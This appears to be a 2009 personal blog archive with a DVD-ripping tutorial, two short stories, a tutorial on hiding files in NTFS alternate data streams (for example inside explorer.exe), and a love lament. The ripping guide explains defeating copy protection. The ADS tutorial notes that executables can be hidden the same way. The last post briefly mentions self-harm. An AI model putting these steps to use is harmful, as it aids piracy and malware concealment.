I recently bought a copy of The Lost Symbol from Indiaplaza.in. Along with the book I got the DVD of DaVinci Code free. The site really does deliver what it promises.. Any ways coming back to the real premise of this blog post, I had not seen the movie version of The DaVinci Code and from the reviews and ratings at IMDB, I had no intentions of seeing it any sooner. Yet here I was holding a DVD of DaVinci Code in my hand. I decided to give my DVDripping skills a test. Not that you require any special skills to rip a DVD into that perfect 700 MB movie that you get on torrents. Its all there on the Internet, the tools and the tutorials.. What you will need is atleast 5 GB of free space and a bit of patience.

Note that piracy in any form is illegal, Im not sure about the scenario in India, although I would advise you to buy the DVD if you like the movie. This tutorial (or blog or article or whatever you want to call it) is strictly educational. Please try not to distribute the files generated at the end of the process.

Coming back to what this is all about. You will need two programs. One is a DVD Ripping program and the other is AutoGK. I personally use DVD Decrypter because of is ease of use. VirtualDubMod is a substitute program that can be used in place of AutoGK. In fact AutoGK uses VirtualDubMod to compress and create the 700 MB avi. We shall see more of them later. For now download these tools from the following links. The Internet is abundant with these tools and a simple Google search will provide you with numerous links:

1. DVD Decrypter: http://www.mrbass.org/dvdrip/SetupDVDDecrypter_3.5.4.0.exe
2. AutoGK: http://www.autogk.me.uk

The requirements before you begin:
A P4 2.0 GHz or faster Windows XP and higher computer (the more the Ghz the better)
Atleast 1 GB of RAM
Atleast 5GB free
A DVD Drive (like duh..)
DVD Decrypter
AutoGK
Lots of patience (because the entire process can take about 2-3 hours depending on the size of the movie and the chosen settings)

Install both the tools and insert the movie DVD into the DVD drive of your computer. It would be advisable to close all open programs since this process is memory and processor intensive.

Part I [Ripping the DVD to the hard drive]

Run the DVD Decrypter program from the Desktop or the Start menu > Programs

The program window shows DVD information like the Label and the Region Code Enhancement (RCE) protection status etc. You can change the destination directory where the ripped files will be kept by clicking on the small folder Icon in the Destination frame of the program window.

On your right hand side of the program window, the list of files on the DVD will be shown. The .VOB files are the movie files and the .IFOs are information files that tell DVD players where a movie chapter begins etc. The .BUPs are backups of the .IFOs.

The DVD may contain several IFOs, but what is important is the IFO that points to the main movie. Look carefully in the list of files on the right. The IFO that has the largest sized VOBs under it is the IFO that we will be using later. In the case of my example VTS_01_0.IFO is the IFO that we will be using later since VTS_01_1.VOB, VTS_01_2.VOB etc are the main movie files (check the file size to get an idea).

In any case let DVD Decrypter select the main movie for you. Go to Edit > Select Main movie files

Once that is done and a output folder selected, you can start the DVD Ripping process by clicking on the DVD icon on the bottom of the program window.

Sit back and relax while DVD Decrypter does its work. The ripping process should take roundabout 10 minutes to finish.

Part II [Making the XVid Avi from the Ripped DVD]

Once the ripping is over, close DVD Decrypter and run AutoGK.

Click on the input file folder icon and browse to the DVD rip folder. Select the IFO file and click open to load the IFO.

Depending on the DVD a "Select PGC" window may be shown as follows. Select the Program Chain (PGC) that has a longer length. In my case PGC 1 had a length of 2 hours, 22 minutes, 46 seconds and 24 milliseconds.

Select the location of the output file by clicking on the folder icon in front of the output file text box in the main AutoGK program window. Type a name that you want the output file to have and click Save.

In a DVD you will often find that there are multiple audio tracks, 6 channels (6ch) are better than 2chs. Make your choice of language (if applicable) and proceed to the Step 3 frame. Here you can choose the final size of the movie that will be output. The higher the size, the better the quality, but most 700 MB (1 CD size) movies are also good enough. Select a size or provide your own using the Custom Size option. In my case I selected English 6 ch audio track and a movie size of 700 MB (1 CD)

Click on Add job to add the current job to the programs queue and then click on Start to start the actual process.

Sit back and relax. You can actually go to sleep for an hour or 2. AutoGK will use VirtualDubMod and lame.exe to process the video and audio respectively. AutoGk will open and close several windows and it is advisable to leave the program alone till the entire process is complete and you are greeted with a Job finished log entry in the AutoGK log window.

Now go grab some popcorn, start the movie using VLC, K-Lite or your favorite movie player and enjoy!!

One Rainy Day

2009-10-01T05:40:00.000-07:00

I wrote this a year ago.. still fresh in my memories..

Everybody loves the rain. I hate it more than god would allow me to. People also love to celebrate their birthdays with lavish parties and expensive drinks and gifts. I hate the day I was born. I didn’t always hate the falling drops nor birthdays. I was a normal guy, am still now, but people don’t think so.

Traveling to work in a rickety old scooter that my father had bought on his 10th Marriage Anniversary, can be a nightmare, especially when you are working in Mumbai and its pouring outside. To add salt to the injury, my father is an optimistic and refuses to accept the fact that the scooter has all the qualifications to be called a fossil. I hate traveling by the bus. You never know a bus, carrying half the population of China, may go down the several flyovers in the city. My financial capabilities limit my rickshaw travel and the only other notion is to walk and walking 6 and a half kilometers early in the morning is not my cup of tea. Not wanting to hurt my fathers spiritual sentiments attached with the antique, I still half ride, half walk to office.

My job is a pretty plain one. Not that I’m complaining; its not what you would expect a First Class with Hons. Electronics and Telecommunications Engineer to do, but yes I love my job. Mr. Ranaut, my boss, a moron by character, comes to my cabin everyday in the morning, throws 6 or 7 files on my desk and leaves without any logical explanation. My self esteem starts draining everyday at 9 in the morning, until the angel appears. Soft spoken and always in black she comes in exactly 6 minutes after he has left. Sabrina, or more specifically Miss Sabrina, is the love of my life. Trapped under the clutches of the ill-tempered Ranaut, she is his personal secretary. She is the only other person on this planet, after my father of course, who loves my scooter. My apprehensions abound. I can’t make out whether she is sympathisizing with me or likes to pull my leg. Whatever the case, she is one reason why I still work in hell. She comes, we clean up the mess that the devil just made and she promises me for coffee at 1:00 and scampers away. I finish all the files well before 1 and the entire day I act busy, just to avoid his Highness. Sabrina and me have lunch and then she comes and goes every fifteen minutes or so into my cabin till 7:00 and then the boss drops her home and I try starting my scooter till 8:00 and by the time I reach home, I forget what time it is.

Sabrina and I have been working together for over a year now. I never had the courage to tell her that I love her more than anything that could have ever existed. Thought it would ruin our friendship, but hey, they always say, no pain no gain. Many a times I gathered enough courage to stand in front of her, look into her deep black eyes and tell her “I Love…” and then my confidence would buckle under the weight of consequences and I would end up saying something stupid like “I Love… to play football, why don’t you join me?” She would always laugh; I would give anything to see her million dollar smile. She always concluded the interaction by saying “Grow up Ranvir!”. And something told me deep inside that she loved me…..

Sabrina didn’t have a father. Her maternal uncle was everything to her. Mr. Dias had died when Sabrina was doing her final year in Commerce. She was the only daughter in the family and Mrs. Dias had succumbed to childbirth. She wasn’t rich but yes, she could have bought 10 of my scooters this afternoon itself! Sabrina had invited me several times to her house, but I never had the time, it was an excuse that my sub conscious mind would definitely be happy to give. In fact I did not have the courage to go to her house and meet her uncle. I knew where she stayed though, precise directions and a road map; she had taken an entire afternoon explaining me the shortest way from my house and from the office.

It was a Thursday, and as usual I was in my cabin working under files and papers. Sabrina came around just to make sure I was still breathing and ran her fingers through my hair. She informed me that Ranaut was leaving and she had to go along, he had to discuss some points for tomorrows meeting with her. It was the usual reason that he gave her and which she gave me. I saw them leave and then 10 minutes later I left. The clouds had gathered overhead and I knew it would pour any minute now.

I reached Delnaz Lane, on the way to my house when it started raining. I parked (threw would be a better word) my scooter next to a flower shop and knew only god would be able to start it now. I had never stopped here in my life and I knew this place was special because Sabrina’s violin classes were on the second floor of the yellow building right in front of me. I still had the map in my pocket; intuition told me to have a look. My heart started beating faster, if my sense of geography was correct, I was standing just two blocks away from Sabrina’s house!! The man in me finally wanting to run and embrace her. The adrenalin rush was just too much to handle, my legs started carrying me towards her house. It was 9 in my watch.

She lived on the ground floor of Diaspora Apartments, a pink building that rose 5 storey high. I reached the front door, the sign unmistakably reading Mr. Denver Gonzalez, her uncle. It was pouring more heavily now. I gathered all the strength in me, this was the point of no return, I gave the bell a solid ring. Felt sick in the stomach, wanted to run, but vanishing courage gave a final push and I rang the bell again. No response. I rang the bell again. Still no response. The suspense was unnerving. It was 9.10, she never slept this early, never. Where was she?? My heart skipped a beat, unfaithful thoughts coming to my head, she was last seen with the jackal and he never made his intentions clear. The clouds were clearing and I assumed she was out on dinner with her uncle. I left.

I reached home at 11.00 in the night, clothes shoddily wet and scooter in hand. I couldn’t sleep that night. For the first time in my life I had gathered enough courage to walk up to her house and ring the bell and she wasn’t there to open it. I cursed my luck.

The phone rang in the morning, when I was leaving. They asked for me, Sabrina had met with an accident, a bus had rammed into her the previous night, she was on a respirator and had lost lot of blood. They said every second she was growing weaker and she had repeatedly called out his name the previous night. They had found his number in her diary. I stood transfixed. My mom shook me out of stupor and I gathered my senses and I ran, I ran like I have never run in my life. Tears wetting my cheeks all along. Exhausted and with burning lungs, I searched for the Intensive Care Unit.

I cursed myself for letting her go that day with Ranaut, I didn't care if he was alive or dead. Mr. Gonzalez said she was hit by the bus when she was crossing the road after ordering flowers from the Florist at Delnaz Lane for some guy named Ranvir, it was his birthday the next day. My eyes were fixed onto her body when they lowered it down into her grave, where she would rest to eternity. She was still wearing black…..

Once Upon a Thursday..

2009-09-10T21:13:00.000-07:00

Mr. Siva Rao lives somewhere in Jayanagar with his one wife and two sons, the eldest of who is yet to appear for his PUC examinations after his two failed attempts. Known to people as Mr. Siva Rao, although his birth certificate identifies him as Vijayawada Sitaramanjaneyula Rajasekhara Yarlagadda Venkata Samba Siva Rao, he is one man who could over react for even the tiniest murmur of thunder in the sky. Known for his shrill audible voice and chalk white lungi that he keeps folding up his waist, Mr. Siva Rao threatens kids, dogs and bikers alike around his locality. He travels to office everyday on his new CBZ, thank heavens he wears pants then.

It was a beautiful Thursday morning. I was still lazing in bed when I heard Mr. Siva Rao yelling on top of his voice. I could also hear the soft spoken voice of Mrs. Rao coming out through their kitchen window. "How am I supposed to cook? I have been telling you to get the cylinder before this one gets over? Don't tell me I did not warn you?" I could vaguely imagine Mrs. Rao, a short beautiful woman in her mid 40s, pointing her stubby fingers at the now worthless piece of metal. Mr. Rao then proceeded to say something in his native tongue, which fortunately I didn't understand, but he sounded angry. Then abruptly there was silence. I wondered whether a peace treaty had been signed or Mrs. Rao was now no more. I sat upright in my bed, stretching myself. I looked out of my window again to see signs of any movement. Their kitchen window was locked; I assumed there wouldn’t be any more verbal ranting so I slipped out of bed to begin my day.

I went through the morning routine methodically to prevent any wastage of water or electricity which the caretaker of our PG house constantly reminds us of. I ironed my clothes, wore my shoes and stepped out wearing a smile that could give Mona Lisa a run for money.

I first thought it was funny to see 4 men on a bike next to the signal where I usually wait for the bus to arrive, but then I realized, it was the same scene everywhere! Cars were carrying 7-8 people, bikes were loaded with 3-4 people and buses were overflowing! I rubbed my eyes to swallow what I could see. There was less traffic on the road though, even at this peak hour. I was nonchalant and assumed it to be just casual traffic police maneuvers. I skipped 6 buses due to the sudden increase in commuters. The doors would not close, I couldn’t see the driver and the windows were all covered with bums of different sizes. Weird I thought. Looked like as if half of China had invaded India, although, I dint see any Mongoloids amongst the crowd. I was running out of time and knew I would get late for my Annual Performance Review meeting with my Manager. I prayed in silent tears.

Somebody on a bike with a pillion rider stopped in front of me. I was happy to see that there were only two people on the bike. The rider pulled off his helmet and then I recognized Mr. Siva Rao. The pillion rider identified himself as Mr. Shetty, Engineer at another Software company down on Outer Ring Road. Mr. Siva Rao spoke hesitantly with his usual deep accented Tamil accent, "So you waiting for bus? No bus. No bus. Mr. Shetty here waiting for bus since 8.00 AM in the morning. All crowded. You come, I drop you to office. On way to Marathalli right. Sit sit." I couldn't refuse but I couldn't stop myself from asking, "Eh.. Mr. Rao… won't the police fine us for riding three on a bike?" Mr. Siva Rao smiled showing his misshapen canines. "Police no say anything. People taking lifts and using buses to reach office. Less traffic faster to reach office less petrol you see." I could see the end of the tunnel from where all insanity of the public was coming from. I shrugged, squeezed between Mr. Siva Rao and Mr. Shetty and closed my eyes for the rest of the journey.

Mr. Siva Rao dropped me at the closest signal to my office and scampered on with Mr. Shetty although in the distance I could see him wait and pick up another hapless stranded soul on the Ring Road. I brushed off the creases on my shirt and crossed the road. Several people were on foot today. I saw my colleague Ritesh** entering the gates as I walked up to him. "No bike today huh?" He responded with a cold shrug and stared stone faced to the building entrance. "A walk a day keeps the doctor away!" I shook my head; I had heard wittier words than those from him.

My day at the office was normal, with just a few bumps here and there. Lunch was something I was looking forward to. Precisely at 2:00, I locked my workstation and proceeded down towards the cafeteria. Several employees were standing at the entrance talking in hushed tones. I saw several of my friends in the lot too. I walked up to them. "Wassup people? Why is everybody out here?" Raees** whisked me out of the crowd and pointed steadfast at a small notice that had been put up at the counter. I carefully read and re-read the posting. I now knew why people appeared scared and why Raees and the others were tensed as if their exam results were to be declared that afternoon.

I walked down towards the lonely mess that is visited by a handful of people down the road outside the campus wondering aloud; "70 bucks for that food?? That's more then a 50 percent hike in prices. God what else?"

I had never been to a mess before, but what I had heard from the others, the food was good and cheap and this place was hardly visited by anybody. I reached the place following crudely drawn directions given to me by another of my colleague, Guru**. I couldn’t recognize the place though because it had been described by people as a deserted waste of space. There were atleast 30 people in there and several standing in a queue outside!! I saw a familiar face in the queue, I didn't know his name but he was from the same floor that I worked on. I waved to him and casually walked up to where he was standing. Assuming it was unbeknownst to the others, I slowly moved my feet, inch by inch in to the queue. As soon as my feet were inside I proceeded to shift the rest of my body in to the line, discussing mundane topics like the elections, Harry Potter and Carmen Electra with my new found friend to throw him and the others off the track. But alas I forgot there were several seasoned players in this game already in the queue. I soon found myself whisked at the end of the line by several pairs of black strong hands that looked and smelt of tar.

I returned to my lab an hour and half later having had the tastiest food that I had eaten in months. I then proceeded to complete my work. Precisely at 6:00, I fired off the mails that I had kept pending for the past few days. Forwarded some nasty office jokes to my friends, locked the workstation and walked down the stairs to begin my journey back to my room.

My afternoon had passed off peacefully and the morning just seemed so far away. As I walked out of the gate, reality slapped me so hard, my eyes watered. There was less traffic no doubt. But the scenario had not improved a tad. There were people on bikes, cars were loaded. I saw several engineers (by the looks of them and the laptop bags they carried) on the top of three trucks, smiling and waving out to people as if they were campaigning for elections!! I vaguely remembered Swades. I flicked out my new Sony Ericcson Z555i with Gesture Control 2 MP camera phone and randomly clicked some pictures. Down the 8th picture, my phone started ringing. Some unknown number, I hoped it wasn’t some bank wanting to give me a personal loan or credit card or something. The excited voice on the other end was familiar. "Look behind, look behind, behind the red truck, between the bus and the truck… look look…" I turned around to see Mr. Siva Rao flailing his hands as if he had just seen Sachin Tendulkar. I walked up to him and smiled. He looked small without his helmet on. Unbelievably he was alone. I did not question him but clambered on to the bike to get home.

I slept peacefully that night dreaming about me discovering an oil well in the background of my PG house, becoming rich overnight and marrying Katrina Kaif. The first thing I did with the money in my dreams was to buy a bicycle. Thanking God they didn't run on petrol.

** Names changed to protect privacy.

NTFS Alternate Data Streams

2009-09-02T02:08:00.000-07:00

The NTFS file system was a remarkable creation for the world of Windows. Windows NT systems have proven their local security largely on the basis of the NTFS file system. It included several new features: quotas, sparse file support, reparse points, distributed link tracking and the Encrypting File System (EFS). What I am going to describe here is not the file system itself, but a little known property of NTFS called ADS. ADS does not stand for Active Directory Services or Asynchronous Digital Systems or Another Dead Soul or anything that whacky. ADS or Alternate Data Stream is any data attached to another file but not within the file itself. Windows implements many of its little known functions like additional file information and tagging files as encrypted using ADS.

One of the most common uses of ADS has to store additional file information like the Authors name, Word count, Pages and other document data of a word file. You can view and edit this information by right clicking a word document >> properties and clicking on the summary tab. In fact any file will have a summary tab on an NTFS drive so that you can indirectly edit the ADS of that particular file. A file without any custom information added, contains a single data stream called $DATA which is the data inside the file itself and is not an alternate data stream. Any other streams attached to it will have the format filename.extension:ADSname:$data. When you open a normal file the default $DATA is read which is the data in the file itself. A normal file will be of the format filename.extension::$Data (Note there is no ADS). Imagine you had a text file full of passwords and you had attached it to explorer.exe, then to access the contents of passwords.txt file you would have to use explorer.exe:passwords.txt:$Data. You can even have ADS for a folder!! In fact any folder on a NTFS system. You could then store your passwords.txt file attached to C:\Windows!!

You can attach any number of files to any single file or folder. That means you could attach a 699 MB DvDrip AVI to a 4 MB Summer of 69.mp3 without increasing the size of your mp3 by a single byte!! Windows does not show the attached file in explorer or by any normal means. The whole 699 MB can be stored on to the hard disk (without anybody knowing) and retrieved later. Since ADS is not stored inside the parent file, the size of the mp3 remains the same!! Although disk space goes down by the same amount.

That kinda sounds far fetched right? Alright lets have a small demonstration. Lets use explorer.exe and passwords.txt

Open Notepad and type the following:
Orkut=h@ck3rz
Rediff=r3dm0nd123
facebook=!@#c3sium

These are web services and their respective passwords. You could type in anything you want. Then save the file as passwords.txt in C: drive.

Then go to Start >> Run >> cmd to open the command prompt. cd.. your way to C:\> then type the following:

C:\>type passwords.txt > C:\Windows\explorer.exe:passwords.txt

Delete the original passwords.txt file from C: drive. The above command is self explanatory but for all those who didnt grasp its entirety, heres how it works. The type command is a cmd internal command to display the contents of a file, so type [filename] will display the contents of the text file. The >, also called as the output redirection operator is used to redirect output from one command to another command or file. C:\Windows\explorer.exe:passwords.txt is the ADS to explorer.exe called Passwords.txt. Now your file is safe and since you have attached it to explorer.exe (highly unlikely to be deleted) you can sleep well.

To retrieve the text file or the data inside, you can again use the command prompt or notepad.

Using command prompt:
C:\>more < C:\Windows\explorer.exe:passwords.txt

More is used to display output one screen at a time. Conveniently type does not work to display file contents here. The <, also (you must have already guessed it) called the input redirection operator takes the file contents from the file and gives it to more so it is displayed a (screen) page at a time. To dump it back to a text file use:

C:\>echo | more < C:\Windows\explorer.exe:passwords.txt > Passwords.txt

This is slightly complicated. Echo is used to display whatever is given to it as an argument. Echo Hello will display Hello. The pipe (|) is used to pass the output of the more command to echo and the > is used to dump whatever got echoed to the text file Passwords.txt. Here is a simpler method.

Using notepad:
Go to Start >> Run and type the following.

Notepad C:\Windows\Explorer.exe:Passwords.txt

Notepad should open up displaying the contents of the file. You can then use File >> Save As to save it anywhere you want.

I went ahead and wrote a program that allows you to work with NTFS Alternare Data Streams (ADS) with ease. You can scan your whole hard disk for NTFS ADS, you can create, delete, modify and export streams easily. This application uses native Windows API and hence is pretty fast at it. The application called NTStream is available here.

Ntstream

Since ADS is any data attached to another file, it will be deleted only if you delete the parent file or if you use a third party tool to delete it. Always remember the name of the data stream and the parent file to which you attached it. Creating data streams could take up valuable hard disk space (if you are planning to hide large files like movies etc.). You can use ADS to hide any type of data, even executable code. Although thats not a good administrative practice, it can be done. Viruses and worms like Email-Worm.Win32.Dumaru.a and Win2K.Stream use ADS to spread. Use ADS efficiently and non-maliciously, use it to your advantage.

My Angel

2009-08-23T03:49:00.000-07:00

She is a year younger to me. We have known each other for over 2 years now, but it seems like we have known each other for centuries. She’s absolutely normal, no complaints at all, like any other girl of her age, extra sensitive towards ideas that have nothing to do with her, mounting tension about studies and placements gripping her every weekend, a feeble smile when she is hurt and two huge tear drops in her eyes when I’m going back to work. With hair that keeps coming across her face whenever I try to stare into her deep black eyes. She pulls them back of course and I swear to God I forget where I am. Life seems complete when she puts her head on to my shoulders and goes to sleep. I feel like living a thousand years, just looking at her talk with constant nods of her head. Feel like pulling her into my arms when she yells that I wasn't listening to her. Life... Life is dragging me hopelessly... I don't know where...

I was an evangelist, preaching how dangerous women are until I met her. She is the sweetest thing that has happened to me. We have exchanged promises, promises of staying together for now and forever, promises of laughing, playing, fighting, eating, walking, dancing, cooking and all the other things I once thought stupid. I cry in the night, when I go to sleep all alone 800 kms away from my sweetheart. Memories of the times we have spent together, the way she nods her head even when she hasn’t understood what I was telling her, her scolding when I would forget to take my medicines, the threatening messages when I dont call her back after she keeps the phone, the times spent in arguing over unimportant stuff, the things she said to me, the care that I take while speaking lest I hurt her, the "You eat first and tell me, then I'll eat" talks, the exam tips that she often took, the "I will love you forever", the numerous "miss you idiot" and they go on. Memories... Sweet memories are all what I have when I am this far, physically separated but emotionally still single. All our friends who know about us swear by our love, a single soul in two bodies, that's what they say. It's difficult to imagine life without her. We can't live without each other. It's difficult to even leave hands when we are getting down the bus!! Life is beautiful when we are together but yet I have to work here in desolation and solitude staring at my screen in the nostalgic company of her photographs. I think over what I have lost and what I have gained by coming here. It was a choice I had to take. Had to come here to earn, to have her. I know people say "money isn't everything", ask me I say. Was sworn by my family long before I had known her, had promised my folks back home to give them a life that they have always desired and then think about settling down in life. Give them all the luxury that my hardworking father never could provide. And all that within the next 3 years.

But alas, God, I feel, doesn't wish to see us together, I am a mortal fighting to have my love with me for eternity. I cry every day, I pray for us, I hurt myself to subdue the pain within, yet the pain that increases with every single day I spend away from her, away from my little angel, yes I call her my angel, my sweet little angel, the pain never fades. The pain is horrible, it's like somebody is holding on to your dreams ready to leave them so that they fall and shatter and it is assumed that you will forget as winds of time sweep off the dust that remains. Forget her? God I could forget I have to breathe, but her? Why are you asking such a heavy price? I cannot fathom what will happen if I am forced to live without her. I have already lost my senses without her next to me here; it won’t be long before I lose myself completely. With parents who come from psychological backgrounds where falling in love is considered to be a violation of the rules of Mother Nature. Where it is thought upholding the honor and dignity of family traditions, rituals and fervor is more important then you being happy with a girl who means the world to you. Where it is thought the so called man made society will talk year after year about the boy who stood against his parents. Where it is thought that choices made by the elders is always right and it is assumed that you will lead a happy life with a complete stranger. Why did God make choices? Why can’t God make our parents understand? Why can’t God just leave us alone?

Eyes reddened with tears, heart heavy and aching with her thoughts, sleepless with feelings that haunt me day and night, I live on. Why did God ever make religions?